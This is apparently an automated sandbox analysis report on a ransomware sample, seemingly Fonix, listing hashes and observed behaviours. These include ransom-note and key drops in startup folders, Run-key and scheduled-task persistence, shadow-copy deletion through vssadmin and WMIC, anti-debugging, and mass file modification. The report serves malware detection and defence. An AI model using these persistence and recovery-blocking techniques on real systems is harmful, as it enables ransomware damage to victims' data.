Analysis
-
max time kernel
110s -
max time network
88s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
02/06/2020, 00:13
Static task
static1
Behavioral task
behavioral1
Sample
de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
Resource
win7v200430
Behavioral task
behavioral2
Sample
de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
Resource
win10v200430
General
-
Target
de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
-
Size
6.0MB
-
MD5
df472f90c33e6c341a74fe1ca29dac70
-
SHA1
d7512488de06b677751014bdc48302c179542558
-
SHA256
de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e
-
SHA512
4257e88d9c6f5eec59d1da6749c386b3859be04159ec37aba2adb3704e5f2ce11ef3adfb086b86d1bea03db300e1d82cab08f266cf6fae4d8f929e71918ddcf9
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 56 IoCs
pid Process 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 820 schtasks.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1456 icacls.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeBackupPrivilege 2028 vssvc.exe Token: SeRestorePrivilege 2028 vssvc.exe Token: SeAuditPrivilege 2028 vssvc.exe Token: SeIncreaseQuotaPrivilege 1568 WMIC.exe Token: SeSecurityPrivilege 1568 WMIC.exe Token: SeTakeOwnershipPrivilege 1568 WMIC.exe Token: SeLoadDriverPrivilege 1568 WMIC.exe Token: SeSystemProfilePrivilege 1568 WMIC.exe Token: SeSystemtimePrivilege 1568 WMIC.exe Token: SeProfSingleProcessPrivilege 1568 WMIC.exe Token: SeIncBasePriorityPrivilege 1568 WMIC.exe Token: SeCreatePagefilePrivilege 1568 WMIC.exe Token: SeBackupPrivilege 1568 WMIC.exe Token: SeRestorePrivilege 1568 WMIC.exe Token: SeShutdownPrivilege 1568 WMIC.exe Token: SeDebugPrivilege 1568 WMIC.exe Token: SeSystemEnvironmentPrivilege 1568 WMIC.exe Token: SeRemoteShutdownPrivilege 1568 WMIC.exe Token: SeUndockPrivilege 1568 WMIC.exe Token: SeManageVolumePrivilege 1568 WMIC.exe Token: 33 1568 WMIC.exe Token: 34 1568 WMIC.exe Token: 35 1568 WMIC.exe Token: SeIncreaseQuotaPrivilege 1568 WMIC.exe Token: SeSecurityPrivilege 1568 WMIC.exe Token: SeTakeOwnershipPrivilege 1568 WMIC.exe Token: SeLoadDriverPrivilege 1568 WMIC.exe Token: SeSystemProfilePrivilege 1568 WMIC.exe Token: SeSystemtimePrivilege 1568 WMIC.exe Token: SeProfSingleProcessPrivilege 1568 WMIC.exe Token: SeIncBasePriorityPrivilege 1568 WMIC.exe Token: SeCreatePagefilePrivilege 1568 WMIC.exe Token: SeBackupPrivilege 1568 WMIC.exe Token: SeRestorePrivilege 1568 WMIC.exe Token: SeShutdownPrivilege 1568 WMIC.exe Token: SeDebugPrivilege 1568 WMIC.exe Token: SeSystemEnvironmentPrivilege 1568 WMIC.exe Token: SeRemoteShutdownPrivilege 1568 WMIC.exe Token: SeUndockPrivilege 1568 WMIC.exe Token: SeManageVolumePrivilege 1568 WMIC.exe Token: 33 1568 WMIC.exe Token: 34 1568 WMIC.exe Token: 35 1568 WMIC.exe -
Adds Run entry to start application 2 TTPs 8 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonixCrypter.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonixCrypter.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\Run\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonixCrypter.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonixCrypter.exe" reg.exe -
Modifies service 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 548 vssadmin.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe -
Suspicious use of WriteProcessMemory 104 IoCs
description pid Process procid_target PID 1100 wrote to memory of 1296 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 25 PID 1100 wrote to memory of 1296 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 25 PID 1100 wrote to memory of 1296 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 25 PID 1100 wrote to memory of 1296 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 25 PID 1296 wrote to memory of 820 1296 cmd.exe 26 PID 1296 wrote to memory of 820 1296 cmd.exe 26 PID 1296 wrote to memory of 820 1296 cmd.exe 26 PID 1296 wrote to memory of 820 1296 cmd.exe 26 PID 1100 wrote to memory of 1312 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 27 PID 1100 wrote to memory of 1312 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 27 PID 1100 wrote to memory of 1312 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 27 PID 1100 wrote to memory of 1312 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 27 PID 1312 wrote to memory of 1308 1312 cmd.exe 28 PID 1312 wrote to memory of 1308 1312 cmd.exe 28 PID 1312 wrote to memory of 1308 1312 cmd.exe 28 PID 1312 wrote to memory of 1308 1312 cmd.exe 28 PID 1100 wrote to memory of 1392 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 29 PID 1100 wrote to memory of 1392 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 29 PID 1100 wrote to memory of 1392 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 29 PID 1100 wrote to memory of 1392 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 29 PID 1392 wrote to memory of 1400 1392 cmd.exe 30 PID 1392 wrote to memory of 1400 1392 cmd.exe 30 PID 1392 wrote to memory of 1400 1392 cmd.exe 30 PID 1392 wrote to memory of 1400 1392 cmd.exe 30 PID 1100 wrote to memory of 1456 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 31 PID 1100 wrote to memory of 1456 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 31 PID 1100 wrote to memory of 1456 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 31 PID 1100 wrote to memory of 1456 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 31 PID 1456 wrote to memory of 1480 1456 cmd.exe 32 PID 1456 wrote to memory of 1480 1456 cmd.exe 32 PID 1456 wrote to memory of 1480 1456 cmd.exe 32 PID 1456 wrote to memory of 1480 1456 cmd.exe 32 PID 1100 wrote to memory of 1520 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 33 PID 1100 wrote to memory of 1520 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 33 PID 1100 wrote to memory of 1520 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 33 PID 1100 wrote to memory of 1520 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 33 PID 1520 wrote to memory of 304 1520 cmd.exe 34 PID 1520 wrote to memory of 304 1520 cmd.exe 34 PID 1520 wrote to memory of 304 1520 cmd.exe 34 PID 1520 wrote to memory of 304 1520 cmd.exe 34 PID 1100 wrote to memory of 308 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 35 PID 1100 wrote to memory of 308 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 35 PID 1100 wrote to memory of 308 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 35 PID 1100 wrote to memory of 308 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 35 PID 308 wrote to memory of 844 308 cmd.exe 36 PID 308 wrote to memory of 844 308 cmd.exe 36 PID 308 wrote to memory of 844 308 cmd.exe 36 PID 308 wrote to memory of 844 308 cmd.exe 36 PID 1100 wrote to memory of 272 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 37 PID 1100 wrote to memory of 272 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 37 PID 1100 wrote to memory of 272 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 37 PID 1100 wrote to memory of 272 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 37 PID 272 wrote to memory of 772 272 cmd.exe 38 PID 272 wrote to memory of 772 272 cmd.exe 38 PID 272 wrote to memory of 772 272 cmd.exe 38 PID 272 wrote to memory of 772 272 cmd.exe 38 PID 1100 wrote to memory of 992 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 39 PID 1100 wrote to memory of 992 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 39 PID 1100 wrote to memory of 992 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 39 PID 1100 wrote to memory of 992 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 39 PID 992 wrote to memory of 736 992 cmd.exe 40 PID 992 wrote to memory of 736 992 cmd.exe 40 PID 992 wrote to memory of 736 992 cmd.exe 40 PID 992 wrote to memory of 736 992 cmd.exe 40 PID 1100 wrote to memory of 1556 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 41 PID 1100 wrote to memory of 1556 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 41 PID 1100 wrote to memory of 1556 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 41 PID 1100 wrote to memory of 1556 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 41 PID 1556 wrote to memory of 1096 1556 cmd.exe 42 PID 1556 wrote to memory of 1096 1556 cmd.exe 42 PID 1556 wrote to memory of 1096 1556 cmd.exe 42 PID 1556 wrote to memory of 1096 1556 cmd.exe 42 PID 1100 wrote to memory of 812 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 43 PID 1100 wrote to memory of 812 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 43 PID 1100 wrote to memory of 812 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 43 PID 1100 wrote to memory of 812 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 43 PID 812 wrote to memory of 540 812 cmd.exe 44 PID 812 wrote to memory of 540 812 cmd.exe 44 PID 812 wrote to memory of 540 812 cmd.exe 44 PID 812 wrote to memory of 540 812 cmd.exe 44 PID 540 wrote to memory of 548 540 cmd.exe 45 PID 540 wrote to memory of 548 540 cmd.exe 45 PID 540 wrote to memory of 548 540 cmd.exe 45 PID 540 wrote to memory of 548 540 cmd.exe 45 PID 812 wrote to memory of 1568 812 cmd.exe 47 PID 812 wrote to memory of 1568 812 cmd.exe 47 PID 812 wrote to memory of 1568 812 cmd.exe 47 PID 812 wrote to memory of 1568 812 cmd.exe 47 PID 812 wrote to memory of 1456 812 cmd.exe 49 PID 812 wrote to memory of 1456 812 cmd.exe 49 PID 812 wrote to memory of 1456 812 cmd.exe 49 PID 812 wrote to memory of 1456 812 cmd.exe 49 PID 1100 wrote to memory of 304 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 50 PID 1100 wrote to memory of 304 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 50 PID 1100 wrote to memory of 304 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 50 PID 1100 wrote to memory of 304 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 50 PID 1100 wrote to memory of 984 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 51 PID 1100 wrote to memory of 984 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 51 PID 1100 wrote to memory of 984 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 51 PID 1100 wrote to memory of 984 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 51 PID 1100 wrote to memory of 272 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 52 PID 1100 wrote to memory of 272 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 52 PID 1100 wrote to memory of 272 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 52 PID 1100 wrote to memory of 272 1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe 52 -
Disables Task Manager via registry modification
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Drops file in Program Files directory 10510 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Angles.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME51.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\fur.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0318448.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00305_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Issue Tracking.gta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EAST_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\WORDIRM.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04134_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105246.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241019.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_FormsHomePageBlank.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Dialog.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\scene_button_style_default_Thumbnail.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\bg_sidebar.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1049\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIcon.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\White_Chocolate.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01240_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01840_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.Runtime.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGPUNCT.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Windows NT\TableTextService\TableTextServiceSimplifiedShuangPin.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Portable Devices\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00608_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\EXCEL.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215710.WMF 